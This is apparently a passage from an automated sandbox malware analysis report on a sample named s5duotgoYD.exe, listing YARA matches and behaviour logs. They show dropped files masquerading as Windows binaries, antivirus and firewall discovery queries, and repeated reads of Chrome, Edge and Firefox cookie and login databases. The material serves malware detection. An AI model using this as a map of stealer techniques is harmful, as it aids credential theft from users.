                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exe Queries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe Queries volume information: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe VolumeInformation
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              Source: Yara match File source: 0.2.s5duotgoYD.exe.131da5f8.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000002.1812029430.0000000013178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: s5duotgoYD.exe PID: 7416, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 8240, type: MEMORYSTR
                              Source: Yara match File source: s5duotgoYD.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.s5duotgoYD.exe.b80000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.1674094332.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: C:\Recovery\xKVBpkhCEjg.exe, type: DROPPED
                              Source: Yara match File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                              Source: Yara match File source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, type: DROPPED
                              Source: Yara match File source: C:\Windows\ModemLogs\conhost.exe, type: DROPPED
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
